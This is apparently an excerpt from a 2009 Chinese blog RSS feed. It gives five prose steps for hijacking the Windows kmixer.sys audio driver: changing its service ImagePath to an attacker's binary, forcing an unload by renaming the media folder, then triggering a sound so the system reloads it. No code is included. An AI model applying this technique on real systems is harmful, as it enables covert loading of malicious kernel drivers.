<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt; text-indent: -18pt; mso-list: l0 level1 lfo1"><span><span style="mso-list: Ignore"><font face="Times New Roman">1.<span style="font: 7pt Times New Roman">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span></font></span></span><span>修改</span><span><font face="Times New Roman">kmixer</font></span><span>服务键的</span><span><font face="Times New Roman">ImagePath</font></span><span>为欲加载</span><span><font face="Times New Roman">bin</font></span><span>路径</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt; text-indent: -18pt; mso-list: l0 level1 lfo1"><span><span style="mso-list: Ignore"><font face="Times New Roman">2.<span style="font: 7pt Times New Roman">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span></font></span></span><span>更改</span><span><font face="Times New Roman">windows</font></span><span>目录下的</span><span><font face="Times New Roman">media</font></span><span>文件夹名，使系统处于&ldquo;哑&rdquo;状态，等待系统卸载</span><span><font face="Times New Roman">kmixer</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt; text-indent: -18pt; mso-list: l0 level1 lfo1"><span><span style="mso-list: Ignore"><font face="Times New Roman">3.<span style="font: 7pt Times New Roman">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span></font></span></span><span>卸载成功后，将</span><span><font face="Times New Roman">media</font></span><span>文件名改回</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt; text-indent: -18pt; mso-list: l0 level1 lfo1"><span><span style="mso-list: Ignore"><font face="Times New Roman">4.<span style="font: 7pt Times New Roman">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span></font></span></span><span>触发一个音频设备发声操作（测试时可使用：拖动喇叭音量条，双击文件夹，点击返回、向上箭头等等，总之一些</span><span><font face="Times New Roman">windows</font></span><span>自定义的音频操作即可）</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt; text-indent: -18pt; mso-list: l0 level1 lfo1"><span><span style="mso-list: Ignore"><font face="Times New Roman">5.<span style="font: 7pt Times New Roman">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span></font></span></span><span>最终触发系统再次加载</span><span><font face="Times New Roman">kmixer.sys</font></span><span>，但此时已被我们劫持</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-indent: 21pt; mso-char-indent-count: 2.0"><span>注意：这是一种较为被动的攻击方式，原因在于如果之前</span><span><font face="Times New Roman">OS</font></span><span>已加载</span><span><font face="Times New Roman">kmixer</font></span><span>，那么可能由于无法人为干预卸载过程，需要等待系统来卸载，而后再触发音频设备发声使</span><span><font face="Times New Roman">kmixer</font></span><span>加载。</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p> <a href="http://hi.baidu.com/wi4r/blog/item/554e8018bfef974c43a9ad35.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/wi4r/blog/category/%2A%B0%CB%D8%D4">*八卦</a>&nbsp;<a href="http://hi.baidu.com/wi4r/blog/item/554e8018bfef974c43a9ad35.html#comment">查看评论</a>]]></description>
        <pubDate>2009-06-25  09:21</pubDate>
        <category><![CDATA[*八卦]]></category>
        <author><![CDATA[wi4r]]></author>
		<guid>http://hi.baidu.com/wi4r/blog/item/554e8018bfef974c43a9ad35.html</guid>
</item>


</channel>
</rss>